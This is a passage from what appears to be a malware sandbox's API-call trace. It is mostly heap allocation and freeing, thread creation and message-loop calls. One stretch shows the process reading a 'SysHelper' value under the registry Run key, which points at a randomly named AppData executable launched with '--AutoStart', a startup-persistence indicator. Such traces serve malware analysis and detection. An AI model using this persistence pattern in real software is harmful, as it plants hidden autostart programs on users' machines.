Size=0x810) returned 0x33baac0 [0108.577] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x660) returned 0x33bf470 [0108.577] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bcaae0 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bcb368 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bcbbf0 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bcc478 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bccd00 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x33bb2d8 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bcd588 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bcde10 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9bdaac8 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9bdb310 [0108.578] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9bdbb78 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bce698 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bcef20 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9bdc3e0 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9bdcc28 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bcf7a8 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd0030 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd08b8 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd1140 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd19c8 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd2250 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd2ad8 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd3360 [0108.579] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd3be8 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd4470 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9bdd470 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9bddcd8 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd4cf8 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd5580 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd5e08 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9bde540 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9bded88 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd6690 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd6f18 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd77a0 [0108.580] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd8028 [0108.581] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd88b0 [0108.581] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bd9138 [0108.581] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bd99c0 [0108.581] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bdf5e8 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bdfe70 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9bef5d0 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9befe38 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be06f8 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be0f80 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be1808 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9bf06a0 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9be2090 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be2918 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be31a0 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be3a28 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be42b0 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be4b38 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be53c0 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be5c48 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be64d0 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be6d58 [0108.582] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9bf0ee8 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x9bf1750 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be75e0 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9be7e68 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be86f0 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x840) returned 0x9be8f78 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9be9800 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bea088 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bea910 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9beb198 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9beba20 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xc0) returned 0x3335c20 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bec2a8 [0108.583] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x9bf1fb8 [0108.584] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x9bf27d0 [0108.584] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x9becb30 [0108.584] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x9bed3b8 [0108.584] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x9bedc40 [0108.584] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x9bee4c8 [0108.584] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x810) returned 0x9bf3000 [0108.585] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f550 [0108.585] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bf3888 [0108.585] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bf4110 [0108.585] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bf4998 [0108.585] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x820) returned 0x9bf5220 [0108.585] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x110) returned 0x33788e0 [0108.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41f130, lpParameter=0x33be368, dwCreationFlags=0x0, lpThreadId=0x337c648 | out: lpThreadId=0x337c648*=0x974) returned 0x694 [0108.586] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41fd80, lpParameter=0x529238, dwCreationFlags=0x0, lpThreadId=0x529230 | out: lpThreadId=0x529230*=0x984) returned 0x698 [0108.587] GetMessageW (in: lpMsg=0x18d438, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18d438) returned 1 [0117.747] NtdllDefWindowProc_W () returned 0x0 [0117.748] NtdllDefWindowProc_W () returned 0x0 [0117.766] NtdllDefWindowProc_W () returned 0x0 [0117.766] NtdllDefWindowProc_W () returned 0x0 [0117.766] NtdllDefWindowProc_W () returned 0x0 [0117.767] NtdllDefWindowProc_W () returned 0x0 [0117.768] NtdllDefWindowProc_W () returned 0x0 [0117.768] NtdllDefWindowProc_W () returned 0x1 [0117.770] NtdllDefWindowProc_W () returned 0x0 [0117.793] NtdllDefWindowProc_W () returned 0x0 [0117.795] NtdllDefWindowProc_W () returned 0x0 [0117.795] NtdllDefWindowProc_W () returned 0x0 [0117.795] NtdllDefWindowProc_W () returned 0x3 [0117.795] TranslateMessage (lpMsg=0x18d438) returned 0 [0117.795] DispatchMessageW (lpMsg=0x18d438) returned 0x0 [0117.795] GetMessageW (in: lpMsg=0x18d438, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18d438) returned 0 [0117.796] NtdllDefWindowProc_W () returned 0x2 [0117.796] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18bb50 | out: phkResult=0x18bb50*=0x6f0) returned 0x0 [0117.796] RegQueryValueExW (in: hKey=0x6f0, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18bb4c, lpData=0x18a278, lpcbData=0x18bb30*=0x400 | out: lpType=0x18bb4c*=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe\" --AutoStart", lpcbData=0x18bb30*=0xe8) returned 0x0 [0117.796] RegCloseKey (hKey=0x6f0) returned 0x0 [0117.796] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xf0) returned 0x3349ad0 [0117.796] lstrlenA (lpString="\" --AutoStart") returned 13 [0117.796] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0xd0) returned 0x32f6970 [0117.796] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3349ad0 | out: hHeap=0x730000) returned 1 [0117.796] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\97f793e1-7a7e-4733-93ae-21a624f0cac5\\h1rxxmJek7fnkHTT.exe") returned 1 [0117.796] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32f6970 | out: hHeap=0x730000) returned 1 [0117.797] IsWindow (hWnd=0x6011c) returned 1 [0117.797] DestroyWindow (hWnd=0x6011c) returned 1 [0117.797] NtdllDefWindowProc_W () returned 0x0 [0117.797] NtdllDefWindowProc_W () returned 0x1 [0117.799] NtdllDefWindowProc_W () returned 0x0 [0117.799] NtdllDefWindowProc_W () returned 0x0 [0117.799] NtdllDefWindowProc_W () returned 0x0 [0117.799] NtdllDefWindowProc_W () returned 0x0 [0117.799] NtdllDefWindowProc_W () returned 0x0 [0117.799] PostQuitMessage (nExitCode=0) [0117.805] NtdllDefWindowProc_W () returned 0x0 [0117.806] CloseHandle (hObject=0x660) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3315558 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3393f70 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3393f98 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3393fc0 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3393fe8 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394010 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394038 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382d40 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382d78 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394060 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394088 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33940b0 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33940d8 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394100 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394128 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394150 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382db0 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382de8 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394178 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33941a0 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33941c8 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33941f0 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394218 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394240 | out: hHeap=0x730000) returned 1 [0117.806] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394268 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394290 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382e20 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382e58 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33942b8 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33942e0 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394308 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394330 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394358 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394380 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33943a8 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33943d0 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382e90 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382ec8 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33943f8 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394420 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394448 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394470 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3394498 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b8950 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a3648 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a2600 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x32f51d0 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x7821c0 | out: hHeap=0x730000) returned 1 [0117.807] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33129e0 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3398408 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33984e0 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33989f0 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33989a8 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33a9b90 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x781810 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x337c640 | out: hHeap=0x730000) returned 1 [0117.808] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x74e708 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3344e20 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbcd20 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbd5a8 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbde30 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbe6b8 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f480 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bbbc10 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33b9228 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc1500 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc8120 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bdb48 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bd330 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bcb18 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bc300 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x8199e0 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33bfbb8 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c0c18 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c1450 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c1c88 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c24c0 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c3538 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c2cf8 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c03e0 | out: hHeap=0x730000) returned 1 [0117.809] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c45c8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c5eb8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c6b38 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c77b8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c3d80 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c5650 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c8830 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c7fe8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c9078 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c98b0 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33c4e10 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33ca0e8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33ca910 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cb968 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cc9d8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cb138 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb0060 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc0048 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33ce2b8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb08e8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb1170 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cd210 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cef38 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cda48 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cc1a0 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33cf780 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc0cc8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb19f8 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb2280 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb3390 | out: hHeap=0x730000) returned 1 [0117.810] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc1d30 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc2da0 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb3c18 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc4680 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc5300 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb44a0 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb4d28 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc35d8 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc5f80 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc67c8 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc2568 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc3e10 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc7010 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb2b08 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb5e38 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb66c0 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb55b0 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb77d0 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bb8058 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bc91c8 | out: hHeap=0x730000) returned 1 [0117.811] HeapFree (in: 